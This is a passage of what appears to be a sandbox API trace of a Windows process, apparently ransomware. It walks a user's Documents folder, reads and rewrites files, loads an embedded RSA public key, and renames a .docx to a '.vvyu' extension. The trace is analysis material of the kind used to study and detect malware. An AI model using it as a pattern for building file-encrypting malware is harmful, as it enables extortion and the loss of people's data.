HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31600 | out: hHeap=0x6a0000) returned 1 [0184.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.767] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x13cf3, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x13cf3, lpOverlapped=0x0) returned 1 [0184.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.769] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13cf8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.769] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.770] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.771] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.771] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.771] CloseHandle (hObject=0x584) returned 1 [0184.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0184.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.773] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\J0wAvHXNsUrjj8.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\j0wavhxnsurjj8.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\J0wAvHXNsUrjj8.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\j0wavhxnsurjj8.docx.vvyu")) returned 1 [0184.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.775] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0184.777] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0184.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0184.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0184.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc) returned 0x2c70bc8 [0184.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82ab8 [0184.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827a0 [0184.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82850 [0184.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0184.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c18 | out: hHeap=0x6a0000) returned 1 [0184.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0184.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0184.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0184.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0184.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0184.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0184.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0184.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.781] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0184.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0184.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0184.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0184.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0184.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0184.782] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0184.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0184.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0184.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82bc0 [0184.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0184.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.783] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c9829c0, ftCreationTime.dwHighDateTime=0x1d8a07d, ftLastAccessTime.dwLowDateTime=0x893b7850, ftLastAccessTime.dwHighDateTime=0x1d8a44e, ftLastWriteTime.dwLowDateTime=0x893b7850, ftLastWriteTime.dwHighDateTime=0x1d8a44e, nFileSizeHigh=0x0, nFileSizeLow=0x159b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nTkcVHLlB.pps", cAlternateFileName="NTKCVH~1.PPS")) returned 1 [0184.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31600 [0184.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0184.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31600 | out: hHeap=0x6a0000) returned 1 [0184.783] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\nTkcVHLlB.pps") returned=".pps" [0184.783] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\nTkcVHLlB.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\ntkcvhllb.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.784] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=88500) returned 1 [0184.784] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.787] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1598e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.787] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.789] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.789] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x159b4, lpOverlapped=0x0) returned 1 [0184.791] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.791] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.791] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.791] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.793] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.793] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.793] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.793] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.793] GetLastError () returned 0x0 [0184.793] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.793] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.793] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.793] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.793] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x159b0) returned 0x2d43778 [0184.794] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31600 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9c0 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6dd8c0 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9d8 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea08 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea68 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea20 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.795] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea68 [0184.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0184.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea20 [0184.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4ea08 [0184.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0184.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0184.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.798] GetCurrentThreadId () returned 0x264 [0184.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36f88 [0184.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.799] GetCurrentThreadId () returned 0x264 [0184.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0184.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.799] HeapFree (in: hHeap=0x6a0000, 